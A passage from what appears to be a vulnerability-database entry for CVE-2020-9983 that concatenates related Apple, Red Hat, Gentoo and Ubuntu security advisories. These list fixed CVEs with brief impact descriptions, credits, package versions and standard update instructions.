improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Kernel
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
inject into active connections within a VPN tunnel
Description: A routing issue was addressed with improved
restrictions.
CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R.
Crandall
Entry added November 12, 2020
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
libxml2
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted file may lead to arbitrary
code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Entry added November 12, 2020
Messages
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9988: William Breuer of the Netherlands
CVE-2020-9989: von Brunn Media
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-13520: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-6147: Aleksandar Nikolic of Cisco Talos
CVE-2020-9972: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
NetworkExtension
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to elevate privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and
Mickey Jin of Trend Micro
Entry added November 12, 2020
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Quick Look
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious app may be able to determine the existence of
files on the computer
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to determine a user's
open tabs in Safari
Description: A validation issue existed in the entitlement
verification.
CVE-2020-9977: Josh Parnham (@joshparnham)
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: The issue was addressed with improved UI handling.
CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba,
Piotr Duszynski
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-13630
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9947: cc working with Trend Micro Zero Day Initiative
CVE-2020-9950: cc working with Trend Micro Zero Day Initiative
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Wi-Fi
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A logic issue was addressed with improved state
management.
CVE-2020-10013: Yu Wang of Didi Research America
Entry added November 12, 2020
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance.
Entry added November 12, 2020
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Entry added November 12, 2020
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
Entry updated November 12, 2020
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
lldb
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
Entry added November 12, 2020
Location Framework
We would like to acknowledge Nicolas Brunner
(linkedin.com/in/nicolas-brunner-651bb4128) for their assistance.
Entry updated October 19, 2020
Mail
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added November 12, 2020
Mail Drafts
We would like to acknowledge Jon Bottarini of HackerOne for their
assistance.
Entry added November 12, 2020
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge Hasan Fahrettin Kaya of Akdeniz
University, an anonymous researcher for their assistance.
Entry updated November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Safari Reader
We would like to acknowledge Zhiyang Zeng(@Wester) of OPPO ZIWU
Security Lab for their assistance.
Entry added November 12, 2020
Security
We would like to acknowledge Christian Starkjohann of Objective
Development Software GmbH for their assistance.
Entry added November 12, 2020
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Onur Can Bıkmaz, Vodafone Turkey
@canbkmaz, Yiğit Can YILMAZ (@yilmazcanyigit), an anonymous
researcher for their assistance.
Entry updated November 12, 2020
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
WebKit
We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan
Pickren (ryanpickren.com), Tsubasa FUJII (@reinforchu), Zhiyang
Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance.
Entry added November 12, 2020
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxqgACgkQZcsbuWJ6
jjBhIhAAhLzDSjgjVzG0JLzEerhFBcAWQ1G8ogmIdxuC0aQfvxO4V1NriKzUcmsZ
UgQCEdN4kzfLsj3KeuwSeq0pg2CX1eZdgY/FyuOBRzljsmGPXJgkyYapJww6mC8n
7jeJazKusiyaRmScLYDwvbOQGlaqCfu6HrM9umMpLfwPGjFqe/gz8jyxohdVZx9t
pNC0g9l37dVJIvFRc1mAm9HAnIQoL8CDOEd96jVYiecB8xk0X6CwjZ7nGzYJc5LZ
A54EaN0dDz+8q8jgylmAd8xkA8Pgdsxw+LWDr1TxPuu3XIzYa98S1AsItK2eiWx8
pIhrzVZ3fk1w3+W/cSWrgzUq4ouijWcWw9dmVgxmzv9ldL/pS+wIgFsYLJm4xHAp
PH+9p3JmMQks9BWgr3h+NEcJwCUm5J7y0PNuCnQL2iKzn4jikqgfCXHZOidkPV3t
KjeeIFX30AGI7cUqhRl9GbRn8l5SA4pbd4a0Y5df1PgkDjSXxw91Z1+5S15Qfrzs
K8pBlPH37yU3aqMEvxBsN5Fd7vdFdA+pV/aWG5tw4pUlZJC25c50w1ZW0vrnsisg
/isPJqXhUWiGAfQ7s5W6W3AMs4PyvRjY+7zzGiHAd+wNkUNwVTbXvKP4W4n/vGH8
uARpQRQsureymLerXpVTwH8ZoeDEeZZwaqNHTQKg/M9ifAZPZUA=
=WdqR
-----END PGP SIGNATURE-----
| VAR-202010-1523 | CVE-2020-9983 | Safari Out-of-bounds write vulnerability in |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution. Apple Safari is a web browser of Apple (Apple), the default browser included with Mac OS X and iOS operating systems. Apple Safari 14.0 has a security vulnerability that stems from a bounds check out of bounds issue.
For the stable distribution (buster), these problems have been fixed in
version 2.30.3-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat OpenShift Container Storage 4.6.5 security and bug fix update
Advisory ID: RHSA-2021:2479-01
Product: Red Hat OpenShift Container Storage
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2479
Issue date: 2021-06-17
CVE Names: CVE-2016-10228 CVE-2017-14502 CVE-2019-2708
CVE-2019-3842 CVE-2019-9169 CVE-2019-13012
CVE-2019-14866 CVE-2019-25013 CVE-2020-8231
CVE-2020-8284 CVE-2020-8285 CVE-2020-8286
CVE-2020-8927 CVE-2020-9948 CVE-2020-9951
CVE-2020-9983 CVE-2020-13434 CVE-2020-13543
CVE-2020-13584 CVE-2020-13776 CVE-2020-15358
CVE-2020-24977 CVE-2020-25659 CVE-2020-25678
CVE-2020-26116 CVE-2020-26137 CVE-2020-27618
CVE-2020-27619 CVE-2020-27783 CVE-2020-28196
CVE-2020-29361 CVE-2020-29362 CVE-2020-29363
CVE-2020-36242 CVE-2021-3139 CVE-2021-3177
CVE-2021-3326 CVE-2021-3449 CVE-2021-3450
CVE-2021-3528 CVE-2021-20305 CVE-2021-23239
CVE-2021-23240 CVE-2021-23336
====================================================================
1. Summary:
Updated images that fix one security issue and several bugs are now
available for Red Hat OpenShift Container Storage 4.6.5 on Red Hat
Enterprise Linux 8 from Red Hat Container Registry.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat OpenShift Container Storage is software-defined storage integrated
with and optimized for the Red Hat OpenShift Container Platform. Red Hat
OpenShift Container Storage is a highly scalable, production-grade
persistent storage for stateful applications running in the Red Hat
OpenShift Container Platform. In addition to persistent storage, Red Hat
OpenShift Container Storage provisions a multicloud data management service
with an S3 compatible API.
Security Fix(es):
* NooBaa: noobaa-operator leaking RPC AuthToken into log files
(CVE-2021-3528)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Bug Fix(es):
* Currently, a newly restored PVC cannot be mounted if some of the
OpenShift Container Platform nodes are running on a version of Red Hat
Enterprise Linux which is less than 8.2, and the snapshot from which the
PVC was restored is deleted.
Workaround: Do not delete the snapshot from which the PVC was restored
until the restored PVC is deleted. (BZ#1962483)
* Previously, the default backingstore was not created on AWS S3 when
OpenShift Container Storage was deployed, due to incorrect identification
of AWS S3. With this update, the default backingstore gets created when
OpenShift Container Storage is deployed on AWS S3. (BZ#1927307)
* Previously, log messages were printed to the endpoint pod log even if the
debug option was not set. With this update, the log messages are printed to
the endpoint pod log only when the debug option is set. (BZ#1938106)
* Previously, the PVCs could not be provisioned as the `rook-ceph-mds` did
not register the pod IP on the monitor servers, and hence every mount on
the filesystem timed out, resulting in CephFS volume provisioning failure.
With this update, an argument `--public-addr=podIP` is added to the MDS pod
when the host network is not enabled, and hence the CephFS volume
provisioning does not fail. (BZ#1949558)
* Previously, OpenShift Container Storage 4.2 clusters were not updated
with the correct cache value, and hence MDSs in standby-replay might report
an oversized cache, as rook did not apply the `mds_cache_memory_limit`
argument during upgrades. With this update, the `mds_cache_memory_limit`
argument is applied during upgrades and the mds daemon operates normally.
(BZ#1951348)
* Previously, the coredumps were not generated in the correct location as
rook was setting the config option `log_file` to an empty string since
logging happened on stdout and not on the files, and hence Ceph read the
value of the `log_file` to build the dump path. With this update, rook does
not set the `log_file` and keeps Ceph's internal default, and hence the
coredumps are generated in the correct location and are accessible under
`/var/log/ceph/`. (BZ#1938049)
* Previously, Ceph became inaccessible, as the mons lose quorum if a mon
pod was drained while another mon was failing over. With this update,
voluntary mon drains are prevented while a mon is failing over, and hence
Ceph does not become inaccessible. (BZ#1946573)
* Previously, the mon quorum was at risk, as the operator could erroneously
remove the new mon if the operator was restarted during a mon failover.
With this update, the operator completes the same mon failover after the
operator is restarted, and hence the mon quorum is more reliable in the
node drains and mon failover scenarios. (BZ#1959983)
All users of Red Hat OpenShift Container Storage are advised to pull these
new images from the Red Hat Container Registry.
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
4. Bugs fixed (https://bugzilla.redhat.com/):
1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod
1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b
1951348 - [GSS][CephFS] health warning "MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files" for the standby-replay
1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore
1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files
1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version]
1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover
1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout
1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod
5. References:
https://access.redhat.com/security/cve/CVE-2016-10228
https://access.redhat.com/security/cve/CVE-2017-14502
https://access.redhat.com/security/cve/CVE-2019-2708
https://access.redhat.com/security/cve/CVE-2019-3842
https://access.redhat.com/security/cve/CVE-2019-9169
https://access.redhat.com/security/cve/CVE-2019-13012
https://access.redhat.com/security/cve/CVE-2019-14866
https://access.redhat.com/security/cve/CVE-2019-25013
https://access.redhat.com/security/cve/CVE-2020-8231
https://access.redhat.com/security/cve/CVE-2020-8284
https://access.redhat.com/security/cve/CVE-2020-8285
https://access.redhat.com/security/cve/CVE-2020-8286
https://access.redhat.com/security/cve/CVE-2020-8927
https://access.redhat.com/security/cve/CVE-2020-9948
https://access.redhat.com/security/cve/CVE-2020-9951
https://access.redhat.com/security/cve/CVE-2020-9983
https://access.redhat.com/security/cve/CVE-2020-13434
https://access.redhat.com/security/cve/CVE-2020-13543
https://access.redhat.com/security/cve/CVE-2020-13584
https://access.redhat.com/security/cve/CVE-2020-13776
https://access.redhat.com/security/cve/CVE-2020-15358
https://access.redhat.com/security/cve/CVE-2020-24977
https://access.redhat.com/security/cve/CVE-2020-25659
https://access.redhat.com/security/cve/CVE-2020-25678
https://access.redhat.com/security/cve/CVE-2020-26116
https://access.redhat.com/security/cve/CVE-2020-26137
https://access.redhat.com/security/cve/CVE-2020-27618
https://access.redhat.com/security/cve/CVE-2020-27619
https://access.redhat.com/security/cve/CVE-2020-27783
https://access.redhat.com/security/cve/CVE-2020-28196
https://access.redhat.com/security/cve/CVE-2020-29361
https://access.redhat.com/security/cve/CVE-2020-29362
https://access.redhat.com/security/cve/CVE-2020-29363
https://access.redhat.com/security/cve/CVE-2020-36242
https://access.redhat.com/security/cve/CVE-2021-3139
https://access.redhat.com/security/cve/CVE-2021-3177
https://access.redhat.com/security/cve/CVE-2021-3326
https://access.redhat.com/security/cve/CVE-2021-3449
https://access.redhat.com/security/cve/CVE-2021-3450
https://access.redhat.com/security/cve/CVE-2021-3528
https://access.redhat.com/security/cve/CVE-2021-20305
https://access.redhat.com/security/cve/CVE-2021-23239
https://access.redhat.com/security/cve/CVE-2021-23240
https://access.redhat.com/security/cve/CVE-2021-23336
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. See the following advisory for the RPM packages for this
release:
https://access.redhat.com/errata/RHSA-2021:2122
Space precludes documenting all of the container images in this advisory.
See the following Release Notes documentation, which will be updated
shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
This update fixes the following bug among others:
* Previously, resources for the ClusterOperator were being created early in
the update process, which led to update failures when the ClusterOperator
had no status condition while Operators were updating. This bug fix changes
the timing of when these resources are created. As a result, updates can
take place without errors. (BZ#1959238)
Security Fix(es):
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index
validation (CVE-2021-3121)
You may download the oc tool and use it to inspect release image metadata
as follows:
(For x86_64 architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64
The image digest is
sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4
(For s390x architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-s390x
The image digest is
sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd
(For ppc64le architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le
The image digest is
sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor
3. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html
4. Bugs fixed (https://bugzilla.redhat.com/):
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled"
1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go
1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list
1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits
1959238 - CVO creating cloud-controller-manager too early causing upgrade failures
1960103 - SR-IOV obliviously reboot the node
1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated
1962302 - packageserver clusteroperator does not set reason or message for Available condition
1962312 - Deployment considered unhealthy despite being available and at latest generation
1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone
1963115 - Test verify /run filesystem contents failing
5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202012-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebkitGTK+: Multiple vulnerabilities
Date: December 23, 2020
Bugs: #755947
ID: 202012-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which could result in the arbitrary execution of code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.30.3 >= 2.30.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.30.3"
References
==========
[ 1 ] CVE-2020-13543
https://nvd.nist.gov/vuln/detail/CVE-2020-13543
[ 2 ] CVE-2020-13584
https://nvd.nist.gov/vuln/detail/CVE-2020-13584
[ 3 ] CVE-2020-9948
https://nvd.nist.gov/vuln/detail/CVE-2020-9948
[ 4 ] CVE-2020-9951
https://nvd.nist.gov/vuln/detail/CVE-2020-9951
[ 5 ] CVE-2020-9952
https://nvd.nist.gov/vuln/detail/CVE-2020-9952
[ 6 ] CVE-2020-9983
https://nvd.nist.gov/vuln/detail/CVE-2020-9983
[ 7 ] WSA-2020-0008
https://webkitgtk.org/security/WSA-2020-0008.html
[ 8 ] WSA-2020-0009
https://webkitgtk.org/security/WSA-2020-0009.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202012-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2020 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. ==========================================================================
Ubuntu Security Notice USN-4648-1
November 26, 2020
webkit2gtk vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in WebKitGTK.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 20.10:
libjavascriptcoregtk-4.0-18 2.30.3-0ubuntu0.20.10.1
libwebkit2gtk-4.0-37 2.30.3-0ubuntu0.20.10.1
Ubuntu 20.04 LTS:
libjavascriptcoregtk-4.0-18 2.30.3-0ubuntu0.20.04.1
libwebkit2gtk-4.0-37 2.30.3-0ubuntu0.20.04.1
Ubuntu 18.04 LTS:
libjavascriptcoregtk-4.0-18 2.30.3-0ubuntu0.18.04.1
libwebkit2gtk-4.0-37 2.30.3-0ubuntu0.18.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK, such as Epiphany, to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-6 Additional information for
APPLE-SA-2020-09-16-4 watchOS 7.0
watchOS 7.0 addresses the following issues. Information about the
security content is also available at
https://support.apple.com/HT211844.
Audio
Available for: Apple Watch Series 3 and later
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Audio
Available for: Apple Watch Series 3 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreAudio
Available for: Apple Watch Series 3 and later
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: Apple Watch Series 3 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
Entry added November 12, 2020
Disk Images
Available for: Apple Watch Series 3 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Entry added November 12, 2020
ImageIO
Available for: Apple Watch Series 3 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab
Entry added November 12, 2020
ImageIO
Available for: Apple Watch Series 3 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Entry added November 12, 2020
Keyboard
Available for: Apple Watch Series 3 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
libxml2
Available for: Apple Watch Series 3 and later
Impact: Processing a maliciously crafted file may lead to arbitrary
code execution
Description: A use after free issue was addressed with improved
memory management.
